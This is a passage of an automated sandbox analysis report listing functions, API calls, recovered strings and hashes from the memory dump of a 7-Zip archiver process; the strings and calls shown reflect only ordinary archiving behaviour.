                                                • Part of subcall function 00452568: free.MSVCRT ref: 004525B5
                                                • Part of subcall function 00452568: free.MSVCRT ref: 004525C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputsfree
                                              • String ID: Creating archive: $StdOut$Updating archive:
                                              • API String ID: 2581285248-1319951512
                                              • Opcode ID: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                              • Instruction ID: 1b831aedf030174015340e08ce1b1882c9852a885d0feaf39713945ab3955318
                                              • Opcode Fuzzy Hash: fa99d9322174690535497a2fdc6b3fb821a8ef614adec2876cfee3e0304a3bf5
                                              • Instruction Fuzzy Hash: ABF04FA5341A45D1DE04DF26EA9435D2321AB45FE5F48D4378E0E4BB59EF2CC48D8308
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                              • Instruction ID: cedeb952e8d6711620d652e32c03db850445d92131fefa12d88ae641985fdef9
                                              • Opcode Fuzzy Hash: a6ffee1f7beb7570a11c572b2a51825e1f9c21a757c731fd3d53281771c8903a
                                              • Instruction Fuzzy Hash: 14E0C81371180581DB14AF77DD911292324A796F4971410579F2D4B326CD58C8568B88
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                              • Instruction ID: b5b10b003bff7e4ea9efc44d17bf9f09bb492295de3d6422ac8d2dc043a13fdd
                                              • Opcode Fuzzy Hash: 167d3dd7d05659914fe51c99b092b0523b74a4040e8688ef161580a56a1d8b48
                                              • Instruction Fuzzy Hash: D88147B3301AC085CB14EF2AD8842AE77A1F786F99F494126DF590B769DF39C886C315
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Q
                                              • API String ID: 0-3463352047
                                              • Opcode ID: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                              • Instruction ID: 3873dd0a3407d3575a5bd76e2f061029c09f2d37d75278bb8a4f4ace3281d212
                                              • Opcode Fuzzy Hash: f10b8452263e2253671aa6e26e66aae54564acf07f5c2ea8efc5759ba0d9d814
                                              • Instruction Fuzzy Hash: C561A362314A8082CB20DF27E4801AEB761F7C9B94F549257EF9E57769DB7CC846CB08
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: act:$ cpus:$ gran:$ page:
                                              • API String ID: 1294909896-454015223
                                              • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                              • Instruction ID: dee6dc8a86794a7efbe81a68765f2ad7d041331173b418f0ac2889651a515894
                                              • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                              • Instruction Fuzzy Hash: 1251086534060151DE28EB13EA513A92321EB8A7D4F44923BDE0A07B6AEFBCC55DC74D
                                              APIs
                                              • free.MSVCRT ref: 004601D7
                                              • _CxxThrowException.MSVCRT ref: 004602EA
                                                • Part of subcall function 0045FD30: _CxxThrowException.MSVCRT ref: 0045FE50
                                              • _CxxThrowException.MSVCRT ref: 0046031F
                                              Strings
                                              • There is no second file name for rename pair:, xrefs: 00460302
                                              • Empty file path, xrefs: 004602CD
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ExceptionThrow$free
                                              • String ID: Empty file path$There is no second file name for rename pair:
                                              • API String ID: 3129652135-1725603831
                                              • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                              • Instruction ID: a68c31bc477a13a25a18f46be81ff460782e7e44315188c2b104882242249469
                                              • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                              • Instruction Fuzzy Hash: EC41C2A220468481CA30DB1AE85079B6B20F3467B8F504317DFB9077D9EB3DC99ACB45
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastSecurity
                                              • String ID:
                                              • API String ID: 555121230-0
                                              • Opcode ID: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                              • Instruction ID: 3d2f01dd79c876f8ac5609bbbf0bdf3f7e0c744d3d04d217a0fd749e9f064057
                                              • Opcode Fuzzy Hash: 4264c5047130bf6628e170ce92b62f2488e22dc27d517a212768e73cfea52f87
                                              • Instruction Fuzzy Hash: 7D417F33202A90D6C760CF26E4447AA73A6F385B98F598136DF5E87714DF38C88AC755
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: = $h<J
                                              • API String ID: 1294909896-2811932181
                                              • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                              • Instruction ID: 2dc6457717a8803ddee641ae9ed7099b91788ed696d8222324f0373e075eef7a
                                              • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                              • Instruction Fuzzy Hash: AA31F463315A8092CB10DF51E49065FAB20F7D27A5F940227FB8E43B69DABCCD4ACB04
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID: #
                                              • API String ID: 1294909896-1885708031
                                              • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                              • Instruction ID: 6914ec4b7782d60d76c024f65ac2b4c8785054889221b05ae5fc16e06f129c60
                                              • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                              • Instruction Fuzzy Hash: AB319023304A9081C720EA17D94055EA764F7957E8FA40627FF9E5BB64DE3CC886CB08
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00453E32), ref: 00453D18
                                              • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00453E32), ref: 00453D25
                                              • _CxxThrowException.MSVCRT ref: 00453D4E
                                              • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,00453E32), ref: 00453DC1
                                              • _CxxThrowException.MSVCRT ref: 00453DFA
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                              • String ID:
                                              • API String ID: 2296236218-0
                                              • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                              • Instruction ID: b1205bab0f51e0971ae7e4191a7665627bca028ecd05481da52ea3c8f0cdab0d
                                              • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                              • Instruction Fuzzy Hash: 4631DC72304AC18ACB20CF25E48035FBBB5F784B95F548126DF8963B24DB38C89AC745
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                              • Instruction ID: 9d2a56d4396ea8cbb277ef431b55cf106b58665af9c6703b795736218808d113
                                              • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                              • Instruction Fuzzy Hash: 81216B67712E408ACF259F26D95132A6720EB86FA9F294227DF2D17799CF39C806C314
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: File$Create$CloseHandleTimefree
                                              • String ID:
                                              • API String ID: 234454789-0
                                              • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                              • Instruction ID: d410d94edd157046b35b9658eb2183be28f6240b6b224602d5c513ca1a28a8ca
                                              • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                              • Instruction Fuzzy Hash: 8821A43230458086D6209F26F954B5B6621F3857F9F544326EE7543BE9CF3CC98ED644
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                              • Instruction ID: d820cb2d76daa244a032169bcef09a4e991cd58d152918ea7a23116a0eea91d1
                                              • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                              • Instruction Fuzzy Hash: A81190E134579091EF04DF679D923EA27159B0AFC5F85842ACE0986306EF7CCA46D38E
                                              APIs
                                                • Part of subcall function 0045B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,004782CA), ref: 0045B56F
                                                • Part of subcall function 0045B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0045B4AA
                                                • Part of subcall function 0045B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0045B4F8
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,00000001,?,004784EC), ref: 00478343
                                                • Part of subcall function 00453404: free.MSVCRT ref: 00453431
                                                • Part of subcall function 00453404: memmove.MSVCRT ref: 0045344C
                                                • Part of subcall function 00458624: free.MSVCRT(?,?,?,?,?,?,0045FF0B), ref: 004586A9
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,00000001,?,004784EC), ref: 0047832B
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,00000001,?,004784EC), ref: 00478336
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$QueryValue$Openmemmove
                                              • String ID: 7z.dll$Software\7-zip
                                              • API String ID: 2771487249-1558686312
                                              • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                              • Instruction ID: 3b894a1a6f3c370999d530201126103511702c2577f4c4e9ec239463fa1efffd
                                              • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                              • Instruction Fuzzy Hash: B011CA6234598050CA20EB23D5553EE6320EBD6BE9F845217AE5D477A7DF2CC64ECB04
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free
                                              • String ID:
                                              • API String ID: 3873070119-0
                                              • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                              • Instruction ID: dde7bc99125ba432b70566518755175c1a7908a06fc6acb24619ecaed90507d5
                                              • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                              • Instruction Fuzzy Hash: C6112EA3314945A2DB20DF26E94035A6330F795B99F404232EFAE83BA5DF6CC949C704
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryfree$ErrorLast
                                              • String ID:
                                              • API String ID: 3252411863-0
                                              • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                              • Instruction ID: 7bd44d72153293366447f691c83e5e8d461a5417191bb9a5650d21b99b1bec5e
                                              • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                              • Instruction Fuzzy Hash: 98018812304A0081D6209B22EA4437F53359BC67F6F984732DE6D837A7DE6DC98E8A08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                              • Instruction ID: 2c59c3edb7636a13fb37eb4de41d0e1e623b3cb69a3e40056787ccfe131041d2
                                              • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                              • Instruction Fuzzy Hash: CAF0B76335690542CA16FE26E66162F5310A787F96F0118679F0E57712DE7CC58BCB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                              • Instruction ID: cbe4e8f7e0d01476da1b14e119d5cfc876969b82d8eed328f24c134615a3de9f
                                              • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                              • Instruction Fuzzy Hash: FCE0E26371280681CB14AF67DDA202A2324AB96F8971410579F2E8B326CD68C85A8B88
                                              APIs
                                              • free.MSVCRT ref: 004925EC
                                              • fputs.MSVCRT ref: 00492636
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$freememset
                                              • String ID: Name$Size
                                              • API String ID: 2276422817-481755742
                                              • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                              • Instruction ID: aca95077d9d0fe1fbdc70b9ff54a40de9d7357ff3715bfbb67c1a94394ff931e
                                              • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                              • Instruction Fuzzy Hash: 6C41B2A2214684B2CF26EF35E5547DF2B20F744BA9F845127AF5E42252DFBCC94AC348
                                              APIs
                                              • fputs.MSVCRT ref: 0049BDCD
                                              • fputs.MSVCRT ref: 0049BE0B
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$memset
                                              • String ID: : Removing files after including to archive$Removing
                                              • API String ID: 3543874852-1218467041
                                              • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                              • Instruction ID: 2ee8d908c9727e914f6e58232f23c6de3eb0b1fc7994b2a0812e878d192d00c7
                                              • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                              • Instruction Fuzzy Hash: 06318362200A8592DE79EB36E5853EE6720E741789F4880379F9F46262DF7CE4CEC344
                                              APIs
                                              • fputs.MSVCRT ref: 0049C4FD
                                              • fputs.MSVCRT ref: 0049C50D
                                              • free.MSVCRT ref: 0049C553
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$freememset
                                              • String ID: :
                                              • API String ID: 2276422817-3653984579
                                              • Opcode ID: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                              • Instruction ID: 4d7957476c56428ba0c779b8ea4009d817ae6d1276ea4954335449cd7069ac92
                                              • Opcode Fuzzy Hash: e9bcf27acdf7ac2d6e3f3cae4111de8fb74b4034055df34e1a2709ccc6db0766
                                              • Instruction Fuzzy Hash: 09117552340A4291CA28EB36D95136E6720B786BE9F084237EF2E47756DF6CD4598348
                                              APIs
                                              • fputs.MSVCRT ref: 0049B8EB
                                              • free.MSVCRT ref: 0049B90A
